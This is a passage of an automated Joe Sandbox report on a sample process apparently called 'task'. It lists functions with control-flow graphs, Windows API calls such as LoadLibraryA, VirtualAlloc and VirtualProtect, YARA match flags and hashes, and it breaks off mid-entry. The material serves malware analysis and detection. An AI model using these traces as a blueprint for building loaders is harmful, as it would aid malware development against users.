                                                                                                                                                                control_flow_graph 247 2648ef1-2648f04 248 2648f06-2648f09 247->248 249 2648f1c-2648f26 247->249 252 2648f0b-2648f0e 248->252 250 2648f35-2648f41 249->250 251 2648f28-2648f30 249->251 253 2648f44-2648f49 250->253 251->250 252->249 254 2648f10-2648f1a 252->254 255 2648f7c-2648f83 LoadLibraryA 253->255 256 2648f4b-2648f56 253->256 254->249 254->252 259 2648f86-2648f8a 255->259 257 2648f72-2648f76 256->257 258 2648f58-2648f70 call 26495bf 256->258 257->253 261 2648f78-2648f7a 257->261 258->257 263 2648f8b-2648f8d 258->263 261->255 261->259 263->259
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02648F83
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: .$.dll
                                                                                                                                                                • API String ID: 1029625771-979041800
                                                                                                                                                                • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                • Instruction ID: bf40aa847489800a863393af2c3abee1a8d2a5c06395e0ee827295aab99b9d1f
                                                                                                                                                                • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                • Instruction Fuzzy Hash: 8521E9756002859FE761DFADCC44B6ABBA5AF053A4F1842ADE882DBB41DB30EC45C780
                                                                                                                                                                Function 6C901054 Relevance: 4.7, APIs: 3, Instructions: 197COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 264 6c901054-6c90106d 265 6c901083-6c901088 264->265 266 6c90106f-6c90107f call 6c902172 264->266 268 6c901095-6c9010bb call 6c8fc1bc 265->268 269 6c90108a-6c901092 265->269 266->265 273 6c901081 266->273 274 6c901231-6c901242 call 6c8f0c5b 268->274 275 6c9010c1-6c9010cc 268->275 269->268 273->265 276 6c9010d2-6c9010d7 275->276 277 6c901224 275->277 279 6c9010f0-6c9010fb call 6c8f93ef 276->279 280 6c9010d9-6c9010e2 call 6c9044e0 276->280 281 6c901226 277->281 279->281 291 6c901101 279->291 280->281 289 6c9010e8-6c9010ee 280->289 284 6c901228-6c90122f call 6c90099f 281->284 284->274 292 6c901107-6c90110c 289->292 291->292 292->281 293 6c901112-6c901127 call 6c8fc1bc 292->293 293->281 296 6c90112d-6c90113f call 6c8f8bc9 293->296 298 6c901144-6c901148 296->298 298->281 299 6c90114e-6c901156 298->299 300 6c901190-6c90119c 299->300 301 6c901158-6c90115d 299->301 303 6c901219 300->303 304 6c90119e-6c9011a0 300->304 301->284 302 6c901163-6c901165 301->302 302->281 306 6c90116b-6c901185 call 6c8f8bc9 302->306 305 6c90121b-6c901222 call 6c90099f 303->305 307 6c9011a2-6c9011ab call 6c9044e0 304->307 308 6c9011b5-6c9011c0 call 6c8f93ef 304->308 305->281 306->284 318 6c90118b 306->318 307->305 319 6c9011ad-6c9011b3 307->319 308->305 317 6c9011c2 308->317 320 6c9011c8-6c9011cd 317->320 318->281 319->320 320->305 321 6c9011cf-6c9011e7 call 6c8f8bc9 320->321 321->305 324 6c9011e9-6c9011f0 321->324 325 6c901211-6c901217 324->325 326 6c9011f2-6c9011f3 324->326 327 6c9011f4-6c901206 call 6c8fc276 325->327 326->327 327->305 330 6c901208-6c90120f call 6c90099f 327->330 330->284
                                                                                                                                                                APIs
                                                                                                                                                                • __freea.LIBCMT ref: 6C901209
                                                                                                                                                                  • Part of subcall function 6C8F93EF: HeapAlloc.KERNEL32(00000000,?,?,?,00000003,6C8F681B,?,?,?,?,00000000,?,00000000,?,?,6C8F8FBF), ref: 6C8F9421
                                                                                                                                                                • __freea.LIBCMT ref: 6C90121C
                                                                                                                                                                • __freea.LIBCMT ref: 6C901229
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __freea$AllocHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 85559729-0
                                                                                                                                                                • Opcode ID: 21cd3727351c125e27173146c04305bb3bd6c293775e2e414e316258bb6ef7fd
                                                                                                                                                                • Instruction ID: 987a33c1e59c62b3450581cc8beb2e92e75c7d7c9de52499ae2145f13e059979
                                                                                                                                                                • Opcode Fuzzy Hash: 21cd3727351c125e27173146c04305bb3bd6c293775e2e414e316258bb6ef7fd
                                                                                                                                                                • Instruction Fuzzy Hash: 9951DF72701246BBEB148FA9DC80EAF3ABDEF5635CB21052DFC14D6A40E770C8558660
                                                                                                                                                                Function 02647934 Relevance: 4.7, APIs: 3, Instructions: 183memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 333 2647934-2647961 334 2647967-264797a 333->334 335 26479e9-26479f0 333->335 342 2647980-26479ac call 2648ecc 334->342 343 2647a1d-2647a20 334->343 336 26479f2-2647a06 335->336 337 2647a0e-2647a10 335->337 336->337 339 2647a22-2647a2d 337->339 340 2647a12-2647a18 337->340 346 2647b34 339->346 347 2647a33-2647a3f 339->347 341 2647b38-2647b42 340->341 353 26479e2 342->353 354 26479ae-26479bd 342->354 343->336 346->341 349 2647a41-2647a4b 347->349 350 2647a4d-2647a75 call 2648ecc SysAllocString 347->350 357 2647a8b-2647a8d 349->357 361 2647a79-2647a88 350->361 358 26479e5-26479e7 353->358 354->336 362 26479bf-26479c4 354->362 357->346 359 2647a93-2647aa7 357->359 358->335 358->336 359->346 366 2647aad-2647acf SafeArrayCreate 359->366 361->357 362->358 364 26479c6-26479dc 362->364 368 26479e0 364->368 366->346 367 2647ad1-2647adc 366->367 369 2647af1-2647b18 367->369 370 2647ade-2647aef 367->370 368->358 372 2647b2d-2647b2e SafeArrayDestroy 369->372 373 2647b1a-2647b2b 369->373 370->369 370->370 372->346 373->372 373->373
                                                                                                                                                                APIs
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 02647A61
                                                                                                                                                                • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 02647AC5
                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02647B2E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArraySafe$AllocCreateDestroyString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2997030761-0
                                                                                                                                                                • Opcode ID: e9dae07e6597974dd7a2e07dc59b16717cc00198222b0edab0e98d7cec828a5a
                                                                                                                                                                • Instruction ID: e5519a0684854e8b2ef4c4de05780816968518f6492189e578ee6436b4aa6050
                                                                                                                                                                • Opcode Fuzzy Hash: e9dae07e6597974dd7a2e07dc59b16717cc00198222b0edab0e98d7cec828a5a
                                                                                                                                                                • Instruction Fuzzy Hash: A1612A71200246AFD729DF60C884BE7B7E8FF49315F148669E999CB141DB30E945CFA1
                                                                                                                                                                Function 6C8DC3A0 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 392 6c8dc3a0-6c8dc3cf GetFileInformationByHandle 393 6c8dc46b-6c8dc47f GetLastError 392->393 394 6c8dc3d5-6c8dc3e0 392->394 395 6c8dc485-6c8dc48b 393->395 396 6c8dc412-6c8dc469 394->396 397 6c8dc3e2-6c8dc401 GetFileInformationByHandleEx 394->397 396->395 397->393 398 6c8dc403-6c8dc40f 397->398 398->396
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileInformationByHandle.KERNELBASE(?,?), ref: 6C8DC3C7
                                                                                                                                                                • GetFileInformationByHandleEx.KERNEL32(?,00000009,00000000,00000008), ref: 6C8DC3F9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC46B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHandleInformation$ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3070998852-0
                                                                                                                                                                • Opcode ID: e9439e09578bac3d28701d4e57c87ba2a58fe034a913960b921fbd75b57b2f80
                                                                                                                                                                • Instruction ID: 7e14eacad666979a3b732ca2b9155c90eb4252381b3c77e8012eaf1f70a458dd
                                                                                                                                                                • Opcode Fuzzy Hash: e9439e09578bac3d28701d4e57c87ba2a58fe034a913960b921fbd75b57b2f80
                                                                                                                                                                • Instruction Fuzzy Hash: F53149B0D00B098BEB20CF55C5407ABF7F4BF98304F208A1DD899A7651E774B685CB90
                                                                                                                                                                Function 6C8FBE1A Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 410 6c8fbe1a-6c8fbe42 call 6c8fb951 413 6c8fbe48-6c8fbe4e 410->413 414 6c8fc007-6c8fc008 call 6c8fb9c2 410->414 416 6c8fbe51-6c8fbe57 413->416 417 6c8fc00d-6c8fc00f 414->417 418 6c8fbe5d-6c8fbe69 416->418 419 6c8fbf53-6c8fbf72 call 6c8f24c0 416->419 421 6c8fc010-6c8fc01e call 6c8f0c5b 417->421 418->416 422 6c8fbe6b-6c8fbe71 418->422 427 6c8fbf75-6c8fbf7a 419->427 425 6c8fbf4b-6c8fbf4e 422->425 426 6c8fbe77-6c8fbe83 IsValidCodePage 422->426 425->421 426->425 429 6c8fbe89-6c8fbe90 426->429 432 6c8fbf7c-6c8fbf81 427->432 433 6c8fbfb7-6c8fbfc1 427->433 430 6c8fbeb2-6c8fbebf GetCPInfo 429->430 431 6c8fbe92-6c8fbe9e 429->431 435 6c8fbf3f-6c8fbf45 430->435 436 6c8fbec1-6c8fbee0 call 6c8f24c0 430->436 434 6c8fbea2-6c8fbead 431->434 437 6c8fbfb4 432->437 438 6c8fbf83-6c8fbf8b 432->438 433->427 439 6c8fbfc3-6c8fbfed call 6c8fb913 433->439 441 6c8fbfff-6c8fc000 call 6c8fba25 434->441 435->414 435->425 436->434 451 6c8fbee2-6c8fbee9 436->451 437->433 443 6c8fbf8d-6c8fbf90 438->443 444 6c8fbfac-6c8fbfb2 438->444 449 6c8fbfee-6c8fbffd 439->449 450 6c8fc005 441->450 448 6c8fbf92-6c8fbf98 443->448 444->432 444->437 448->444 452 6c8fbf9a-6c8fbfaa 448->452 449->441 449->449 450->417 453 6c8fbeeb-6c8fbef0 451->453 454 6c8fbf15-6c8fbf18 451->454 452->444 452->448 453->454 455 6c8fbef2-6c8fbefa 453->455 456 6c8fbf1d-6c8fbf24 454->456 457 6c8fbf0d-6c8fbf13 455->457 458 6c8fbefc-6c8fbf03 455->458 456->456 459 6c8fbf26-6c8fbf3a call 6c8fb913 456->459 457->453 457->454 460 6c8fbf04-6c8fbf0b 458->460 459->434 460->457 460->460
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8FB951: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 6C8FB97C
                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,6C8FBC61,?,00000000,?,00000000,?), ref: 6C8FBE7B
                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,6C8FBC61,?,00000000,?,00000000,?), ref: 6C8FBEB7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                                • Opcode ID: ce48a8bba367c1dcfe39be599f1cc3ab94ddbe0f4e1e8b20a64ca46c70e4b972
                                                                                                                                                                • Instruction ID: 0b9a32777cf9e2961101038bdc9505286565a1195c80a0db7e59b24fa41f5b83
                                                                                                                                                                • Opcode Fuzzy Hash: ce48a8bba367c1dcfe39be599f1cc3ab94ddbe0f4e1e8b20a64ca46c70e4b972
                                                                                                                                                                • Instruction Fuzzy Hash: 02511470A442459EEB30CF39CA806BAFBF4EF45388F14496ED0A687A51E7749147CF90
                                                                                                                                                                Function 6C8DD570 Relevance: 3.1, APIs: 2, Instructions: 91threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNELBASE(00000000,?,Function_0003D6D0,00000000,00010000,00000000), ref: 6C8DD5DB
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DD633
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateErrorLastThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1689873465-0
                                                                                                                                                                • Opcode ID: d5ba701981ece82e481027dfa4f0d7eb5eaa9cad26760205384e9369c28c430b
                                                                                                                                                                • Instruction ID: d67e43524e716a9d978ed3e20794a80dbc9daba2f341e0f498d115b0f21aaf3a
                                                                                                                                                                • Opcode Fuzzy Hash: d5ba701981ece82e481027dfa4f0d7eb5eaa9cad26760205384e9369c28c430b
                                                                                                                                                                • Instruction Fuzzy Hash: 4B31B0B5A402099FDB20DF58DD01BAEBBB4FF09714F144429F948A7781D731A914CBA1
                                                                                                                                                                Function 6C8F0916 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6C8F0963
                                                                                                                                                                  • Part of subcall function 6C8F0E1B: InitializeSListHead.KERNEL32(6C933C88,6C8F096D,6C91B238,00000010,6C8F08FE,?,?,?,6C8F0B26,?,00000001,?,?,00000001,?,6C91B280), ref: 6C8F0E20
                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C8F09CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3231365870-0
                                                                                                                                                                • Opcode ID: ed12b061e217e1e83c6602eed40a55e9bf24e9ea6b64161d77f24ee2ae1ea1ab
                                                                                                                                                                • Instruction ID: 8b5cb6d58c50cca3148dcd0e0a764b9d758a31ee527cfa75d1ab1392a9b33935
                                                                                                                                                                • Opcode Fuzzy Hash: ed12b061e217e1e83c6602eed40a55e9bf24e9ea6b64161d77f24ee2ae1ea1ab
                                                                                                                                                                • Instruction Fuzzy Hash: 5921D4713893859EEF305BB89A053CD37715B463ADF204C39C874A7EC2DB22924BC651
                                                                                                                                                                Function 02646DCE Relevance: 3.0, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 02648EF1: LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02648F83
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,00000004,00000040,?), ref: 02646E06
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,00000004,?,?), ref: 02646E29
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 895956442-0
                                                                                                                                                                • Opcode ID: 4b81b02862df4f1b90606a87d7a95fef9c5f7f2dde159036914d36a532f09deb
                                                                                                                                                                • Instruction ID: deea74e7b9a082b01359725563ee08af919eb731b3a6ccdec0ca6e6a0157fe4d
                                                                                                                                                                • Opcode Fuzzy Hash: 4b81b02862df4f1b90606a87d7a95fef9c5f7f2dde159036914d36a532f09deb
                                                                                                                                                                • Instruction Fuzzy Hash: AFF08CB21406087EE711AA64CC41FFF32EDDB49A50F000428FB86D6080EFA1E6418BE5
                                                                                                                                                                Function 6C8F8BC9 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LCMapStringEx.KERNELBASE(?,6C901144,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 6C8F8BFD
                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,6C901144,?,?,-00000008,?,00000000), ref: 6C8F8C1B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2568140703-0
                                                                                                                                                                • Opcode ID: d1c4a4ce449dc66154939d932115146da89481c19f040d6e30ed0caba3276745
                                                                                                                                                                • Instruction ID: 4c8c2e71d321b97d905db14e19df24e32d3694eb7483a28a584ef0b27568f70a
                                                                                                                                                                • Opcode Fuzzy Hash: d1c4a4ce449dc66154939d932115146da89481c19f040d6e30ed0caba3276745
                                                                                                                                                                • Instruction Fuzzy Hash: 09F0CA3250112ABBCF221F91CE04DCE3F26EF0A7A0F018816FE2865120C732D872EB90
                                                                                                                                                                Function 02647B43 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02647BBD
                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 02647F01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2087232378-0
                                                                                                                                                                • Opcode ID: 1a5418cea19d400be9e889379b85ba4036e89269bda122047750eba29fcf4b87
                                                                                                                                                                • Instruction ID: c5bd3a4f0b284185250e471f49188edb4ad4f00d7149f1c8ee3efa4e7d1537e0
                                                                                                                                                                • Opcode Fuzzy Hash: 1a5418cea19d400be9e889379b85ba4036e89269bda122047750eba29fcf4b87
                                                                                                                                                                • Instruction Fuzzy Hash: 5FB1C272500A06EBDB26AE60CC80BBBF7E9FF49314F100A1DE9D996250DF31E954CB95
                                                                                                                                                                Function 6C8FAA91 Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(-00000004,00000001,6C8F87DD,6C8F887D,?,6C8F80F4,00000000,00000000), ref: 6C8FAA95
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8FAB37
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                • Opcode ID: b2abb413f28cdcc20a0b8bb1936970a9a83173bf97ce92effd920a763c28145d
                                                                                                                                                                • Instruction ID: da4a044e16d9b02438858e59900f8be8da1766c78c51b6a6e7c4833e0205249d
                                                                                                                                                                • Opcode Fuzzy Hash: b2abb413f28cdcc20a0b8bb1936970a9a83173bf97ce92effd920a763c28145d
                                                                                                                                                                • Instruction Fuzzy Hash: 9A11C2753882157FD7311AFE8FC8ED62668EB032FCB200A35F53496A80DB54880B8660
                                                                                                                                                                Function 6C8FBA25 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,6C8FBC61,?), ref: 6C8FBA57
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Info
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1807457897-0
                                                                                                                                                                • Opcode ID: 567f1e5b8f8a06fa7f8e80d7b1a4bc2504d7d09bc6b92a201f9c9f01c73ef6a5
                                                                                                                                                                • Instruction ID: 7e73ee50292f189753658c53be997ab2b686deec9b2a33526b6426a4430ae0f7
